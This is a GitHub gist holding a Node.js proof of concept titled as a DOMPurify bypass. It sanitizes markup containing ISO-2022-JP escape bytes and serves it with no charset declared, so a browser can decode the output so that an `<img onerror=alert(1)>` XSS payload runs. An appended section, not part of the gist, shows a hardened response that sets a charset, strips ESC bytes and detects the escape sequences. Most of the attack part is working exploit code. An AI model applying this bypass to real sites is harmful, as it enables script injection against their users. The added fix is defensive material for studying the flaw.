@gavz
Forked from kevin-mizu/app.js
Created July 17, 2024 19:05
DOMPurify bypass using ISO-2022-JP
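const createDOMPurify = require("dompurify");
const { JSDOM } = require("jsdom");
const http = require("http");

const server = http.createServer((req, res) => {
  // DOMPurify runs against a jsdom window on the server side.
  const window = new JSDOM("").window;
  const DOMPurify = createDOMPurify(window);

  // \x1b$B (ESC $ B) switches ISO-2022-JP to JIS X 0208 and \x1b(B (ESC ( B)
  // switches back to ASCII. The sanitizer sees two <a> elements whose id
  // attributes hold plain text.
  const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);

  res.statusCode = 200;
  // No charset is declared, so the browser chooses the encoding itself.
  // This is the condition the bypass depends on.
  res.setHeader("Content-Type", "text/html");
  res.end(clean);
});

const PORT = process.env.PORT || 3000;
server.listen(PORT, () => {
  console.log(`Server is running on port ${PORT}`);
});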
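
A hardened response path for the server above, as an added example that is not part of the original gist: it declares the charset explicitly, so the browser does not have to guess an encoding, and drops ESC bytes as defence in depth. `findIso2022JpEscapes` and `sendHtml` are hypothetical names, and the sample is the gist's sanitizer input reused as constructed test data.

```javascript
// Added example, not part of the original gist. Function names are hypothetical.

// Character-set switches understood by the WHATWG ISO-2022-JP decoder:
//   ESC ( B  ASCII                 ESC ( J  JIS X 0201 Roman
//   ESC ( I  JIS X 0201 Katakana
//   ESC $ @ and ESC $ B  JIS X 0208 (two bytes per character)
const ISO_2022_JP_ESCAPES = /\x1b(?:\([BJI]|\$[@B])/g;

// Constructed sample: the string the gist passes to DOMPurify.sanitize().
const SAMPLE = `<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`;

// Report every ISO-2022-JP escape sequence in a string, for logging or alerting.
function findIso2022JpEscapes(html) {
  return [...html.matchAll(ISO_2022_JP_ESCAPES)].map((m) => ({
    index: m.index,
    sequence: "ESC " + m[0].slice(1).split("").join(" "),
  }));
}

// Send already-sanitized HTML with an explicit charset.
function sendHtml(res, html) {
  // Remove every ESC (U+001B), not only complete sequences: deleting matched
  // sequences alone could let the leftovers join into a new one.
  const body = html.replace(/\x1b/g, "");
  res.statusCode = 200;
  // The declared charset is what stops the browser from picking ISO-2022-JP.
  res.setHeader("Content-Type", "text/html; charset=utf-8");
  res.end(Buffer.from(body, "utf8"));
  return body;
}

// Stand-alone demo: list the escape sequences found in the sample.
console.log(findIso2022JpEscapes(SAMPLE));
```

In the gist's handler, `sendHtml(res, clean)` would replace the three lines that set the status code, the header and the body.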